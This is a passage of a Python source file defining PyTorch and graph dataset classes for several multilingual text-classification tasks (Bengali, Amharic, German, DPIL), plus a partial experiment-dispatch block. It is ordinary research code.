        return self.data_frame.shape[0]
    def __getitem__(self, idx):
        """Return (input_ids, token_type_ids, attention_mask) for the pair at row `idx`."""
        row = self.data_frame.iloc[idx, :]
        sentence_1 = row['sentence_1']
        sentence_2 = row['sentence_2']
        input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1, sentence_2], self.max_length)
        return input_ids, token_type_ids, attention_mask
class DPIL_Subtask_2AuxDataset(GraphDataset):
    """Auxiliary graph dataset for DPIL subtask 2.

    Caches one graph per data-frame row, built from either sentence_1 or
    sentence_2 depending on which flag was set at construction time.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # Attributes must exist before super().__init__(), which may call process().
        self.data_frame = data_frame
        self.DT_G = DT_G
        # Exactly one of the two sentence flags must be selected.
        assert(sum([is_sentence_1, is_sentence_2]) == 1)
        self.is_sentence_1 = is_sentence_1
        self.is_sentence_2 = is_sentence_2
        super(DPIL_Subtask_2AuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed DPIL_Subtask_2 Aux dataset from {root}')
    @property
    def raw_file_names(self):
        # No raw files: the data frame is supplied directly.
        return []
    @property
    def processed_file_names(self):
        # One cached file per row; the prefix records which sentence was used.
        row_count = self.data_frame.shape[0]
        if(self.is_sentence_1):
            return [f'aux_1_{i}.pt' for i in range(row_count)]
        elif(self.is_sentence_2):
            return [f'aux_2_{i}.pt' for i in range(row_count)]
    def process(self):
        """Build and cache one graph per row for the selected sentence column."""
        row_total = self.data_frame.shape[0]
        for i, row in tqdm(self.data_frame.iterrows(), total=row_total):
            label = row['label']
            if(self.is_sentence_1):
                context = row['sentence_1']
            elif(self.is_sentence_2):
                context = row['sentence_2']
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            graph = Data()
            graph['edge_index'] = edge_index.to(config.device)
            graph['edge_attr'] = edge_attr.to(config.device)
            graph['y'] = utils.get_label_embedding(label, config.DPIL_subtask_2_labels).to(config.device)
            graph['sentence'] = context
            # Nodes are the whitespace-separated tokens of the sentence.
            graph.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(graph)):
                continue
            if(self.pre_transform is not None):
                graph = self.pre_transform(graph)
            if(self.is_sentence_1):
                torch.save(graph, os.path.join(self.processed_dir, f'aux_1_{i}.pt'))
            elif(self.is_sentence_2):
                torch.save(graph, os.path.join(self.processed_dir, f'aux_2_{i}.pt'))
    def len(self):
        # Dataset size = number of cached graph files.
        return len(self.processed_file_names)
    def get(self, idx):
        """Load and return the cached graph `idx` for the selected sentence."""
        if(self.is_sentence_1):
            path = os.path.join(self.processed_dir, f'aux_1_{idx}.pt')
        elif(self.is_sentence_2):
            path = os.path.join(self.processed_dir, f'aux_2_{idx}.pt')
        return torch.load(path)
class KhondokerIslam_BengaliLMDataset(Dataset):
    """LM dataset for the KhondokerIslam Bengali sentiment task: one encoded sentence per row."""
    # Pre-computed maximum sub-word length (incl. special tokens) for this corpus.
    max_length = 218
    def __init__(self, data_frame, tokenizer):
        self.data_frame = data_frame
        self.tokenizer = tokenizer
        # The fixed padding length must fit within the tokenizer's hard limit.
        assert(self.max_length <= self.tokenizer.model_max_length)
    def _compute_max_length(self):
        """Scan the corpus and return the max encoded length, capped at the tokenizer limit."""
        print(f'Computing max length (sub-word + special tokens) on KhondokerIslam_Bengali dataset')
        max_length = 0
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            sentence_1 = row['Data']
            input_ids = self.tokenizer.encode(sentence_1, add_special_tokens=True)
            max_length = max(max_length, len(input_ids))
        # Cap at the model's maximum supported sequence length.
        max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
        print(f'Max length (sub-word + special tokens) on KhondokerIslam_Bengali dataset: {max_length}')
        # Fix: return the computed value instead of discarding it.
        return max_length
    def __len__(self):
        return self.data_frame.shape[0]
    def __getitem__(self, idx):
        """Return (input_ids, token_type_ids, attention_mask) for row `idx`."""
        row = self.data_frame.iloc[idx, :]
        sentence_1 = row['Data']
        input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1], self.max_length)
        return input_ids, token_type_ids, attention_mask
class KhondokerIslam_BengaliAuxDataset(GraphDataset):
    """Auxiliary graph dataset for the KhondokerIslam Bengali sentiment task.

    Builds one graph per data-frame row from the distributional-thesaurus
    graph `DT_G` and caches it as `aux_1_<row>.pt` under `root`.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # Single-sentence task: only the sentence-1 variant is supported.
        assert(is_sentence_1 == True and is_sentence_2 == False)
        # Attributes must be set before super().__init__(), which may call process().
        self.data_frame = data_frame
        self.DT_G = DT_G
        super(KhondokerIslam_BengaliAuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed KhondokerIslam_Bengali from {root}')
    @property
    def raw_file_names(self):
        # No raw files: the data frame is supplied directly.
        return []
    @property
    def processed_file_names(self):
        # One cached graph file per data-frame row.
        return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
    def process(self):
        """Build and cache one graph `Data` object per row."""
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            label = row['Sentiment']
            context = row['Data']
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            # Fix: place the label embedding on the configured device for
            # consistency with edge_index/edge_attr (matches the DPIL aux datasets).
            data['y'] = utils.get_label_embedding(label, config.KhondokerIslam_bengali_labels).to(config.device)
            data['sentence'] = context
            # Nodes are the whitespace-separated tokens of the sentence.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
    def len(self):
        # Dataset size = number of cached graph files.
        return len(self.processed_file_names)
    def get(self, idx):
        """Load and return the cached graph for row `idx`."""
        data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        return data
class Rezacsedu_SentimentLMDataset(Dataset):
    """LM dataset for the Rezacsedu sentiment task: one encoded sentence per row."""
    # Pre-computed maximum sub-word length (incl. special tokens) for this corpus.
    max_length = 260
    def __init__(self, data_frame, tokenizer):
        self.data_frame = data_frame
        self.tokenizer = tokenizer
        # The fixed padding length must fit within the tokenizer's hard limit.
        assert(self.max_length <= self.tokenizer.model_max_length)
    def _compute_max_length(self):
        """Scan the corpus and return the max encoded length, capped at the tokenizer limit."""
        print(f'Computing max length (sub-word + special tokens) on Rezacsedu_Sentiment dataset')
        max_length = 0
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            sentence_1 = row['text']
            input_ids = self.tokenizer.encode(sentence_1, add_special_tokens=True)
            max_length = max(max_length, len(input_ids))
        # Cap at the model's maximum supported sequence length.
        max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
        print(f'Max length (sub-word + special tokens) on Rezacsedu_Sentiment dataset: {max_length}')
        # Fix: return the computed value instead of discarding it.
        return max_length
    def __len__(self):
        return self.data_frame.shape[0]
    def __getitem__(self, idx):
        """Return (input_ids, token_type_ids, attention_mask) for row `idx`."""
        row = self.data_frame.iloc[idx, :]
        sentence_1 = row['text']
        input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1], self.max_length)
        return input_ids, token_type_ids, attention_mask
class Rezacsedu_SentimentAuxDataset(GraphDataset):
    """Auxiliary graph dataset for the Rezacsedu sentiment task.

    Builds one graph per data-frame row from the distributional-thesaurus
    graph `DT_G` and caches it as `aux_1_<row>.pt` under `root`.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # Single-sentence task: only the sentence-1 variant is supported.
        assert(is_sentence_1 == True and is_sentence_2 == False)
        # Attributes must be set before super().__init__(), which may call process().
        self.data_frame = data_frame
        self.DT_G = DT_G
        super(Rezacsedu_SentimentAuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed Rezacsedu_Sentiment from {root}')
    @property
    def raw_file_names(self):
        # No raw files: the data frame is supplied directly.
        return []
    @property
    def processed_file_names(self):
        # One cached graph file per data-frame row.
        return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
    def process(self):
        """Build and cache one graph `Data` object per row."""
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            label = row['label']
            context = row['text']
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            # Fix: place the label embedding on the configured device for
            # consistency with edge_index/edge_attr (matches the DPIL aux datasets).
            data['y'] = utils.get_label_embedding(label, config.rezacsedu_sentiment_labels).to(config.device)
            data['sentence'] = context
            # Nodes are the whitespace-separated tokens of the sentence.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
    def len(self):
        # Dataset size = number of cached graph files.
        return len(self.processed_file_names)
    def get(self, idx):
        """Load and return the cached graph for row `idx`."""
        data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        return data
class BEmoCLMDataset(Dataset):
    """LM dataset for the BEmoC emotion task: one encoded (cleaned) sentence per row."""
    # Pre-computed maximum sub-word length (incl. special tokens) for this corpus.
    max_length = 460
    def __init__(self, data_frame, tokenizer):
        self.data_frame = data_frame
        self.tokenizer = tokenizer
        # The fixed padding length must fit within the tokenizer's hard limit.
        assert(self.max_length <= self.tokenizer.model_max_length)
    def _compute_max_length(self):
        """Scan the corpus and return the max encoded length, capped at the tokenizer limit."""
        print(f'Computing max length (sub-word + special tokens) on BEmoCLMDataset dataset')
        max_length = 0
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            sentence_1 = row['cleaned']
            input_ids = self.tokenizer.encode(sentence_1, add_special_tokens=True)
            max_length = max(max_length, len(input_ids))
        # Cap at the model's maximum supported sequence length.
        max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
        print(f'Max length (sub-word + special tokens) on BEmoCLMDataset dataset: {max_length}')
        # Fix: return the computed value instead of discarding it.
        return max_length
    def __len__(self):
        return self.data_frame.shape[0]
    def __getitem__(self, idx):
        """Return (input_ids, token_type_ids, attention_mask) for row `idx`."""
        row = self.data_frame.iloc[idx, :]
        sentence_1 = row['cleaned']
        input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1], self.max_length)
        return input_ids, token_type_ids, attention_mask
class BEmoCLMDatasetAuxDataset(GraphDataset):
    """Auxiliary graph dataset for the BEmoC emotion task.

    Builds one graph per data-frame row from the distributional-thesaurus
    graph `DT_G` and caches it as `aux_1_<row>.pt` under `root`.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # Single-sentence task: only the sentence-1 variant is supported.
        assert(is_sentence_1 == True and is_sentence_2 == False)
        # Attributes must be set before super().__init__(), which may call process().
        self.data_frame = data_frame
        self.DT_G = DT_G
        super(BEmoCLMDatasetAuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed BEmoCL from {root}')
    @property
    def raw_file_names(self):
        # No raw files: the data frame is supplied directly.
        return []
    @property
    def processed_file_names(self):
        # One cached graph file per data-frame row.
        return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
    def process(self):
        """Build and cache one graph `Data` object per row."""
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            label = row['classes']
            context = row['cleaned']
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            # Fix: place the label embedding on the configured device for
            # consistency with edge_index/edge_attr (matches the DPIL aux datasets).
            data['y'] = utils.get_label_embedding(label, config.BEmoC_labels).to(config.device)
            data['sentence'] = context
            # Nodes are the whitespace-separated tokens of the sentence.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
    def len(self):
        # Dataset size = number of cached graph files.
        return len(self.processed_file_names)
    def get(self, idx):
        """Load and return the cached graph for row `idx`."""
        data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        return data
class Seid_Amharic_SentimentLMDataset(Dataset):
    """LM dataset for the Seid Amharic sentiment task: one encoded sentence per row."""
    # Pre-computed maximum sub-word length (incl. special tokens) for this corpus.
    max_length = 95
    def __init__(self, data_frame, tokenizer):
        self.data_frame = data_frame
        self.tokenizer = tokenizer
        # The fixed padding length must fit within the tokenizer's hard limit.
        assert(self.max_length <= self.tokenizer.model_max_length)
    def _compute_max_length(self):
        """Scan the corpus and return the max encoded length, capped at the tokenizer limit."""
        print(f'Computing max length (sub-word + special tokens) on Seid_Amharic_Sentiment dataset')
        max_length = 0
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            sentence_1 = row['sentence']
            input_ids = self.tokenizer.encode(sentence_1, add_special_tokens=True)
            max_length = max(max_length, len(input_ids))
        # Cap at the model's maximum supported sequence length.
        max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
        print(f'Max length (sub-word + special tokens) on Seid_Amharic_Sentiment dataset: {max_length}')
        # Fix: return the computed value instead of discarding it.
        return max_length
    def __len__(self):
        return self.data_frame.shape[0]
    def __getitem__(self, idx):
        """Return (input_ids, token_type_ids, attention_mask) for row `idx`."""
        row = self.data_frame.iloc[idx, :]
        sentence_1 = row['sentence']
        input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1], self.max_length)
        return input_ids, token_type_ids, attention_mask
class Seid_Amharic_SentimentAuxDataset(GraphDataset):
    """Auxiliary graph dataset for the Seid Amharic sentiment task.

    Builds one graph per data-frame row from the distributional-thesaurus
    graph `DT_G` and caches it as `aux_1_<row>.pt` under `root`.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # Single-sentence task: only the sentence-1 variant is supported.
        assert(is_sentence_1 == True and is_sentence_2 == False)
        # Attributes must be set before super().__init__(), which may call process().
        self.data_frame = data_frame
        self.DT_G = DT_G
        super(Seid_Amharic_SentimentAuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed Seid_Amharic_Sentiment from {root}')
    @property
    def raw_file_names(self):
        # No raw files: the data frame is supplied directly.
        return []
    @property
    def processed_file_names(self):
        # One cached graph file per data-frame row.
        return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
    def process(self):
        """Build and cache one graph `Data` object per row."""
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            label = row['label']
            context = row['sentence']
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            # Fix: place the label embedding on the configured device for
            # consistency with edge_index/edge_attr (matches the DPIL aux datasets).
            data['y'] = utils.get_label_embedding(label, config.Seid_Amharic_Sentiment_labels).to(config.device)
            data['sentence'] = context
            # Nodes are the whitespace-separated tokens of the sentence.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
    def len(self):
        # Dataset size = number of cached graph files.
        return len(self.processed_file_names)
    def get(self, idx):
        """Load and return the cached graph for row `idx`."""
        data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        return data
class Seid_Amharic_Cleaned_SentimentAuxDataset(GraphDataset):
    """Auxiliary graph dataset for the cleaned Seid Amharic sentiment task.

    Builds one graph per data-frame row from the distributional-thesaurus
    graph `DT_G` and caches it as `aux_1_<row>.pt` under `root`.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # Single-sentence task: only the sentence-1 variant is supported.
        assert(is_sentence_1 == True and is_sentence_2 == False)
        # Attributes must be set before super().__init__(), which may call process().
        self.data_frame = data_frame
        self.DT_G = DT_G
        super(Seid_Amharic_Cleaned_SentimentAuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed Seid_Amharic_Cleaned_Sentiment from {root}')
    @property
    def raw_file_names(self):
        # No raw files: the data frame is supplied directly.
        return []
    @property
    def processed_file_names(self):
        # One cached graph file per data-frame row.
        return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
    def process(self):
        """Build and cache one graph `Data` object per row."""
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            label = row['label']
            context = row['sentence']
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            # Fix: place the label embedding on the configured device for
            # consistency with edge_index/edge_attr (matches the DPIL aux datasets).
            data['y'] = utils.get_label_embedding(label, config.Seid_Amharic_Sentiment_cleaned_labels).to(config.device)
            data['sentence'] = context
            # Nodes are the whitespace-separated tokens of the sentence.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
    def len(self):
        # Dataset size = number of cached graph files.
        return len(self.processed_file_names)
    def get(self, idx):
        """Load and return the cached graph for row `idx`."""
        data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        return data
class Amharic_EvalAuxDataset(GraphDataset):
    """Auxiliary graph dataset for the Amharic evaluation set.

    Builds one graph per data-frame row from the distributional-thesaurus
    graph `DT_G` and caches it as `aux_1_<row>.pt` under `root`.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # Single-sentence task: only the sentence-1 variant is supported.
        assert(is_sentence_1 == True and is_sentence_2 == False)
        # Attributes must be set before super().__init__(), which may call process().
        self.data_frame = data_frame
        self.DT_G = DT_G
        super(Amharic_EvalAuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed Amharic_Eval from {root}')
    @property
    def raw_file_names(self):
        # No raw files: the data frame is supplied directly.
        return []
    @property
    def processed_file_names(self):
        # One cached graph file per data-frame row.
        return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
    def process(self):
        """Build and cache one graph `Data` object per row."""
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            label = row['label']
            context = row['sentence']
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            # Fix: place the label embedding on the configured device for
            # consistency with edge_index/edge_attr (matches the DPIL aux datasets).
            data['y'] = utils.get_label_embedding(label, config.Amharic_eval_labels).to(config.device)
            data['sentence'] = context
            # Nodes are the whitespace-separated tokens of the sentence.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
    def len(self):
        # Dataset size = number of cached graph files.
        return len(self.processed_file_names)
    def get(self, idx):
        """Load and return the cached graph for row `idx`."""
        data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        return data
class Germeval2018LMDataset(Dataset):
    """LM dataset for GermEval 2018: one encoded sentence per data-frame row."""
    # Pre-computed maximum sub-word length (incl. special tokens) for this corpus.
    max_length = 228
    def __init__(self, data_frame, tokenizer):
        self.data_frame = data_frame
        self.tokenizer = tokenizer
        # The fixed padding length must fit within the tokenizer's hard limit.
        assert(self.max_length <= self.tokenizer.model_max_length)
    def _compute_max_length(self):
        """Scan the corpus and return the max encoded length, capped at the tokenizer limit."""
        print(f'Computing max length (sub-word + special tokens) on Germeval2018 dataset')
        max_length = 0
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            sentence_1 = row['sentence']
            input_ids = self.tokenizer.encode(sentence_1, add_special_tokens=True)
            max_length = max(max_length, len(input_ids))
        # Cap at the model's maximum supported sequence length.
        max_length = max_length if max_length <= self.tokenizer.model_max_length else self.tokenizer.model_max_length
        print(f'Max length (sub-word + special tokens) on Germeval2018 dataset: {max_length}')
        # Fix: return the computed value instead of discarding it.
        return max_length
    def __len__(self):
        return self.data_frame.shape[0]
    def __getitem__(self, idx):
        """Return (input_ids, token_type_ids, attention_mask) for row `idx`."""
        row = self.data_frame.iloc[idx, :]
        sentence_1 = row['sentence']
        input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, [sentence_1], self.max_length)
        return input_ids, token_type_ids, attention_mask
class Germeval2018_Subtask_1AuxDataset(GraphDataset):
    """Auxiliary graph dataset for GermEval 2018 subtask 1.

    Builds one graph per data-frame row from the distributional-thesaurus
    graph `DT_G` and caches it as `aux_1_<row>.pt` under `root`.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # Single-sentence task: only the sentence-1 variant is supported.
        assert(is_sentence_1 == True and is_sentence_2 == False)
        # Attributes must be set before super().__init__(), which may call process().
        self.data_frame = data_frame
        self.DT_G = DT_G
        super(Germeval2018_Subtask_1AuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed Germeval_Subtask_1 from {root}')
    @property
    def raw_file_names(self):
        # No raw files: the data frame is supplied directly.
        return []
    @property
    def processed_file_names(self):
        # One cached graph file per data-frame row.
        return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
    def process(self):
        """Build and cache one graph `Data` object per row."""
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            label = row['subtask_1_label']
            context = row['sentence']
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            # Fix: place the label embedding on the configured device for
            # consistency with edge_index/edge_attr (matches the DPIL aux datasets).
            data['y'] = utils.get_label_embedding(label, config.germeval2018_subtask_1_labels).to(config.device)
            data['sentence'] = context
            # Nodes are the whitespace-separated tokens of the sentence.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
    def len(self):
        # Dataset size = number of cached graph files.
        return len(self.processed_file_names)
    def get(self, idx):
        """Load and return the cached graph for row `idx`."""
        data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        return data
class Germeval2018_Subtask_2AuxDataset(GraphDataset):
    """Auxiliary graph dataset for GermEval 2018 subtask 2.

    Builds one graph per data-frame row from the distributional-thesaurus
    graph `DT_G` and caches it as `aux_1_<row>.pt` under `root`.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # Single-sentence task: only the sentence-1 variant is supported.
        assert(is_sentence_1 == True and is_sentence_2 == False)
        # Attributes must be set before super().__init__(), which may call process().
        self.data_frame = data_frame
        self.DT_G = DT_G
        super(Germeval2018_Subtask_2AuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed Germeval_Subtask_2 from {root}')
    @property
    def raw_file_names(self):
        # No raw files: the data frame is supplied directly.
        return []
    @property
    def processed_file_names(self):
        # One cached graph file per data-frame row.
        return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
    def process(self):
        """Build and cache one graph `Data` object per row."""
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            label = row['subtask_2_label']
            context = row['sentence']
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            # Fix: place the label embedding on the configured device for
            # consistency with edge_index/edge_attr (matches the DPIL aux datasets).
            data['y'] = utils.get_label_embedding(label, config.germeval2018_subtask_2_labels).to(config.device)
            data['sentence'] = context
            # Nodes are the whitespace-separated tokens of the sentence.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
    def len(self):
        # Dataset size = number of cached graph files.
        return len(self.processed_file_names)
    def get(self, idx):
        """Load and return the cached graph for row `idx`."""
        data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        return data
if __name__ == '__main__':
    def _build_loader_and_show_batch(lm_dataset, dataset_aux_1, dataset_aux_2):
        """Wrap the datasets in a GraphDataLoader and print one batch's shapes.

        ``dataset_aux_2`` is None for single-sentence tasks; then the wrapper
        carries only the LM dataset and the first auxiliary dataset. Returns
        the constructed loader. (Extracted from the previously duplicated
        train/dev inspection code.)
        """
        if(dataset_aux_2 is not None):
            loader = GraphDataLoader(WrapperDataset(lm_dataset, dataset_aux_1, dataset_aux_2), batch_size=config.batch_size)
        else:
            loader = GraphDataLoader(WrapperDataset(lm_dataset, dataset_aux_1), batch_size=config.batch_size)
        batch = next(iter(loader))
        if(len(batch) == 3):
            [[input_ids, token_type_ids, attention_mask], batch_aux_1, batch_aux_2] = batch
        else:
            [[input_ids, token_type_ids, attention_mask], batch_aux_1] = batch
            batch_aux_2 = None
        print(f'input_ids.shape: {input_ids.shape}')
        print(f'token_type_ids.shape: {token_type_ids.shape}')
        print(f'attention_mask.shape: { attention_mask.shape}')
        print(f'batch_aux_1: {batch_aux_1}')
        if(batch_aux_2 is not None):
            print(f'batch_aux_2: {batch_aux_2}')
        return loader

    DT_G = utils.load_DT()
    # Dispatch on the configured experiment: build the tokenizer, the LM
    # dataset and one or two auxiliary graph datasets for train and dev.
    # Sentence-pair tasks get aux_1 + aux_2; single-sentence tasks set aux_2
    # to None. Lower-casing is used for the English GLUE-style tasks only.
    if(config.experiment == 'WiC'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=True)
        WiC_train_data_frame = utils.get_WiC_data_frame(config.WiC_train_data_path, config.WiC_train_gold_path)
        train_LM_dataset = WiCLMDataset(WiC_train_data_frame, tokenizer)
        train_dataset_aux_1 = WiCAuxDataset(root='../data/WiC/train/', data_frame=WiC_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = WiCAuxDataset(root='../data/WiC/train/', data_frame=WiC_train_data_frame, DT_G=DT_G, is_sentence_2=True)
        WiC_dev_data_frame = utils.get_WiC_data_frame(config.WiC_dev_data_path, config.WiC_dev_gold_path)
        dev_LM_dataset = WiCLMDataset(WiC_dev_data_frame, tokenizer)
        dev_dataset_aux_1 = WiCAuxDataset(root='../data/WiC/dev/', data_frame=WiC_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = WiCAuxDataset(root='../data/WiC/dev/', data_frame=WiC_dev_data_frame, DT_G=DT_G, is_sentence_2=True)
    elif(config.experiment == 'RTE'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=True)
        RTE_train_data_frame = utils.get_RTE_data_frame(config.RTE_train_data_path)
        train_LM_dataset = RTELMDataset(RTE_train_data_frame, tokenizer)
        train_dataset_aux_1 = RTEAuxDataset(root='../data/glue_data/RTE/train/', data_frame=RTE_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = RTEAuxDataset(root='../data/glue_data/RTE/train/', data_frame=RTE_train_data_frame, DT_G=DT_G, is_sentence_2=True)
        RTE_dev_data_frame = utils.get_RTE_data_frame(config.RTE_dev_data_path)
        dev_LM_dataset = RTELMDataset(RTE_dev_data_frame, tokenizer)
        dev_dataset_aux_1 = RTEAuxDataset(root='../data/glue_data/RTE/dev/', data_frame=RTE_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
        dev_dataset_aux_2 = RTEAuxDataset(root='../data/glue_data/RTE/dev/', data_frame=RTE_dev_data_frame, DT_G=DT_G, is_sentence_2=True)
    elif(config.experiment == 'STS_B'):
        tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=True)
        STS_B_train_data_frame = utils.get_STS_B_data_frame(config.STS_B_train_data_path)
        train_LM_dataset = STS_BLMDataset(STS_B_train_data_frame, tokenizer)
        train_dataset_aux_1 = STS_BAuxDataset('../data/glue_data/STS-B/train/', data_frame=STS_B_train_data_frame, DT_G=DT_G, is_sentence_1=True)
        train_dataset_aux_2 = STS_BAuxDataset('../data/glue_data/STS-B/train/', data_frame=STS_B_train_data_frame, DT_G=DT_G, is_sentence_2=True)
        STS_B_dev_data_frame = utils.get_STS_B_data_frame(config.STS_B_dev_data_path)
